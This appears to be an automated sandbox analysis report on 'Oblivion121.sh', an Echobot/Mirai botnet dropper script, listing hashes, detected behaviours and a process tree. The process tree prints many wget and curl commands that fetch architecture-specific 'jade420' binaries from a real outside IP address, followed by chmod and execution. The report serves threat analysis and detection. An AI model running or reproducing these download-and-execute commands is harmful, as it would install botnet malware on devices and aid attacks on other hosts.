Overview

overview

10

Static

static

1

Oblivion121.sh

ubuntu-18.04-amd64

10

Oblivion121.sh

debian-9-armhf

10

Oblivion121.sh

debian-9-mips

10

Oblivion121.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    78s
  • max time network
    152s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240418-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    29/03/2025, 15:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Oblivion121.sh

  • Size

    1KB

  • MD5

    506ea803fdb2d5a593683fe98fec6f1f

  • SHA1

    f71d6ccbfd48bff6ba7c06a7250e137f5ab75066

  • SHA256

    71451b64fc1acf7e50295e14859f7957966210efb8351a26882f96781aa7c4e1

  • SHA512

    213cf82427a6b073293b65f0745fa5bc95e24c7f684aec2f97b7548d4d099c0a0251f691d4a514818da6ad5b6674c55549eaa960a7ac7e2d28ee391d9d626fc5

Score
10/10
echobotmiraibotnetdefense_evasiondiscoverytrojan

Malware Config

Signatures

  • Detected Echobot 2 IoCs
  • Echobot

    An updated variant of Mirai which infects a wide range of IoT devices to form a botnet.

    botnettrojanechobot
  • Echobot family
    echobot
  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (168005) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 18 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates active TCP sockets 1 TTPs 9 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Changes its process name 9 IoCs
  • Reads system network configuration 1 TTPs 9 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/Oblivion121.sh
    /tmp/Oblivion121.sh
    1⤵
    • Executes dropped EXE
    • Writes file to tmp directory
    PID:709
    • /usr/bin/wget
      wget http://176.65.144.18/bins/jade420.x86
      2⤵
      • Writes file to tmp directory
      PID:712
    • /usr/bin/curl
      curl -O http://176.65.144.18/bins/jade420.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:738
    • /bin/cat
      cat jade420.x86
      2⤵
        PID:739
      • /bin/chmod
        chmod +x cp jade420.x86 Oblivion121.sh systemd-private-d5ea4fa2c7ed4bddb56f002a681611f0-systemd-timedated.service-lq89oW
        2⤵
        • File and Directory Permissions Modification
        PID:740
      • /tmp/cp
        ./cp x86
        2⤵
          PID:741
        • /usr/bin/wget
          wget http://176.65.144.18/bins/jade420.mips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:743
        • /usr/bin/curl
          curl -O http://176.65.144.18/bins/jade420.mips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:744
        • /bin/cat
          cat jade420.mips
          2⤵
          • System Network Configuration Discovery
          PID:750
        • /bin/chmod
          chmod +x cp jade420.mips jade420.x86 Oblivion121.sh systemd-private-d5ea4fa2c7ed4bddb56f002a681611f0-systemd-timedated.service-lq89oW
          2⤵
          • File and Directory Permissions Modification
          PID:752
        • /tmp/cp
          ./cp mips
          2⤵
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          • System Network Configuration Discovery
          PID:753
        • /usr/bin/wget
          wget http://176.65.144.18/bins/jade420.mpsl
          2⤵
          • Writes file to tmp directory
          PID:762
        • /usr/bin/curl
          curl -O http://176.65.144.18/bins/jade420.mpsl
          2⤵
          • Writes file to tmp directory
          PID:772
        • /bin/chmod
          chmod +x cp jade420.mips jade420.mpsl jade420.x86 Oblivion121.sh systemd-private-d5ea4fa2c7ed4bddb56f002a681611f0-systemd-timedated.service-lq89oW
          2⤵
          • File and Directory Permissions Modification
          PID:787
        • /tmp/cp
          ./cp mpsl
          2⤵
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:789
        • /usr/bin/wget
          wget http://176.65.144.18/bins/jade420.arm4
          2⤵
            PID:824
          • /usr/bin/curl
            curl -O http://176.65.144.18/bins/jade420.arm4
            2⤵
            • Writes file to tmp directory
            PID:832
          • /bin/chmod
            chmod +x cp jade420.arm4 jade420.mips jade420.mpsl jade420.x86 Oblivion121.sh systemd-private-d5ea4fa2c7ed4bddb56f002a681611f0-systemd-timedated.service-lq89oW
            2⤵
            • File and Directory Permissions Modification
            PID:844
          • /tmp/cp
            ./cp arm4
            2⤵
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:845
          • /usr/bin/wget
            wget http://176.65.144.18/bins/jade420.arm5
            2⤵
            • Writes file to tmp directory
            PID:859
          • /usr/bin/curl
            curl -O http://176.65.144.18/bins/jade420.arm5
            2⤵
            • Writes file to tmp directory
            PID:866
          • /bin/chmod
            chmod +x cp jade420.arm4 jade420.arm5 jade420.mips jade420.mpsl jade420.x86 Oblivion121.sh systemd-private-d5ea4fa2c7ed4bddb56f002a681611f0-systemd-timedated.service-lq89oW
            2⤵
            • File and Directory Permissions Modification
            PID:868
          • /tmp/cp
            ./cp arm5
            2⤵
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:869
          • /usr/bin/wget
            wget http://176.65.144.18/bins/jade420.arm6
            2⤵
            • Writes file to tmp directory
            PID:876
          • /usr/bin/curl
            curl -O http://176.65.144.18/bins/jade420.arm6
            2⤵
            • Writes file to tmp directory
            PID:883
          • /bin/chmod
            chmod +x cp jade420.arm4 jade420.arm5 jade420.arm6 jade420.mips jade420.mpsl jade420.x86 Oblivion121.sh
            2⤵
            • File and Directory Permissions Modification
            PID:885
          • /tmp/cp
            ./cp arm6
            2⤵
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:886
          • /usr/bin/wget
            wget http://176.65.144.18/bins/jade420.arm7
            2⤵
            • Writes file to tmp directory
            PID:890
          • /usr/bin/curl
            curl -O http://176.65.144.18/bins/jade420.arm7
            2⤵
            • Writes file to tmp directory
            PID:897
          • /bin/chmod
            chmod +x cp jade420.arm4 jade420.arm5 jade420.arm6 jade420.arm7 jade420.mips jade420.mpsl jade420.x86 Oblivion121.sh
            2⤵
            • File and Directory Permissions Modification
            PID:899
          • /tmp/cp
            ./cp arm7
            2⤵
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:900
          • /usr/bin/wget
            wget http://176.65.144.18/bins/jade420.ppc
            2⤵
            • Writes file to tmp directory
            PID:904
          • /usr/bin/curl
            curl -O http://176.65.144.18/bins/jade420.ppc
            2⤵
            • Writes file to tmp directory
            PID:911
          • /bin/chmod
            chmod +x cp jade420.arm4 jade420.arm5 jade420.arm6 jade420.arm7 jade420.mips jade420.mpsl jade420.ppc jade420.x86 Oblivion121.sh
            2⤵
            • File and Directory Permissions Modification
            PID:913
          • /tmp/cp
            ./cp ppc
            2⤵
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:914
          • /usr/bin/wget
            wget http://176.65.144.18/bins/jade420.m68k
            2⤵
            • Writes file to tmp directory
            PID:918
          • /usr/bin/curl
            curl -O http://176.65.144.18/bins/jade420.m68k
            2⤵
            • Writes file to tmp directory
            PID:925
          • /bin/chmod
            chmod +x cp jade420.arm4 jade420.arm5 jade420.arm6 jade420.arm7 jade420.m68k jade420.mips jade420.mpsl jade420.ppc jade420.x86 Oblivion121.sh
            2⤵
            • File and Directory Permissions Modification
            PID:927
          • /tmp/cp
            ./cp m68k
            2⤵
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:928
          • /usr/bin/wget
            wget http://176.65.144.18/bins/jade420.sh4
            2⤵
            • Writes file to tmp directory
            PID:932
          • /usr/bin/curl
            curl -O http://176.65.144.18/bins/jade420.sh4
            2⤵
            • Writes file to tmp directory
            PID:939
          • /bin/chmod
            chmod +x cp jade420.arm4 jade420.arm5 jade420.arm6 jade420.arm7 jade420.m68k jade420.mips jade420.mpsl jade420.ppc jade420.sh4 jade420.x86 Oblivion121.sh
            2⤵
            • File and Directory Permissions Modification
            PID:941
          • /tmp/cp
            ./cp sh4
            2⤵
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:942

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/cp
          Filesize

          95KB

          MD5

          3d2c880e79089241c8fbb272ee31060b

          SHA1

          23233e3043dc70c1e21e352f99bdcfc70a233dcd

          SHA256

          7961cf5c0d14018d558bdb82ee0f4bb07967e1fd671444dd708ed782fdda54e4

          SHA512

          1246ed2d4bdfe5f43f6f6ea13704d9a5c59c70d446b16be55103de187e2a97912e89ff1ff44553b900fba08e977309f2804af47a0afc6120555fe04afd5718e3

          Download Submit

        • /tmp/jade420.x86
          Filesize

          68KB

          MD5

          ca9c4fc72ea948856f5a37956f167bfc

          SHA1

          a689a0fc903757672b777dda4f82a8688556d333

          SHA256

          96f4ce7b2e797678dab4ccafd828ace3718b945bfe8a05357688a5cd2d166fc4

          SHA512

          900e34ae8667a6cea737e5a16c3143d9ab8e20a3f466bc6b616bf47fc961809bfd3ffcdc938c0941c4209ac3ed4af2066d82942dd45e05f78199e87d9a87ddf2

          Download Submit